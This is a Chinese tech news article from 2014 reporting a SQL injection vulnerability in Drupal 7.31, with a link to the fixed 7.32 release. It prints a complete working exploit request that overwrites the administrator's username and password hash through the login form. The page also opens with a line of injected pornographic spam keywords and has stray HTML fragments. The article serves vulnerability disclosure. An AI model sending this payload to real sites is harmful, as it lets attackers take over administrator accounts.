自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

<nobr id="v1p1r"></nobr>

<ruby id="v1p1r"><tt id="v1p1r"></tt></ruby>

AI.x社區(qū)

軟考社區(qū)

企業(yè)培訓

鴻蒙開發(fā)者社區(qū)

WOT技術大會

公眾號矩陣

移動端

視頻課免費課排行榜短視頻直播課軟考學堂

全部課程軟考華為認證廠商認證 IT技術 PMP項目管理免費題庫

文章資源問答課堂專欄直播

51CTO

鴻蒙開發(fā)者社區(qū)

51CTO技術棧

51CTO官微

51CTO學堂

51CTO博客

CTO訓練營

鴻蒙開發(fā)者社區(qū)訂閱號

51CTO軟考

51CTO學堂APP

51CTO學堂企業(yè)版APP

鴻蒙開發(fā)者社區(qū)視頻號

51CTO軟考題庫

賬號設置退出

Drupal 7.31版本爆嚴重SQL注入漏洞

作者：pnig0s 2014-10-17 09:12:35

今早有國外安全研究人員在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞，并給出了利用測試的EXP代碼，小編在本地搭建Drupal7.31的環(huán)境，經(jīng)過測試，發(fā)現(xiàn)該利用代碼可成功執(zhí)行并在數(shù)據(jù)庫中增加一個攻擊者自定義的用戶。

今早有國外安全研究人員在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞，并給出了利用測試的EXP代碼，小編在本地搭建Drupal7.31的環(huán)境，經(jīng)過測試，發(fā)現(xiàn)該利用代碼可成功執(zhí)行并在數(shù)據(jù)庫中增加一個攻擊者自定義的用戶。

測試代碼：(請勿用于非法用途)

POST /drupal-7.31/?q=node&destination=node HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/drupal-7.31/
Cookie: Drupal.toolbar.collapsed=0; Drupal.tableDrag.showWeight=0; has_js=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 231
name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in

本地環(huán)境測試效果：

請相關廠商關注，并盡快修復漏洞。

新版下載：

https://www.drupal.org/drupal-7.32

責任編輯：藍雨淚來源： FreeBuf

Drupal SQL注入 SQL注入漏洞

51CTO技術棧公眾號

業(yè)務
速覽

媒體

51CTO CIOAge HC3i

社區(qū)

51CTO博客鴻蒙開發(fā)者社區(qū) AI.x社區(qū)

教育

51CTO學堂精培企業(yè)培訓 CTO訓練營

<sub id="sren5"></sub>

^{<blockquote id="sren5"><i id="sren5"></i></blockquote>}

<sub id="sren5"><rt id="sren5"><form id="sren5"></form></rt></sub>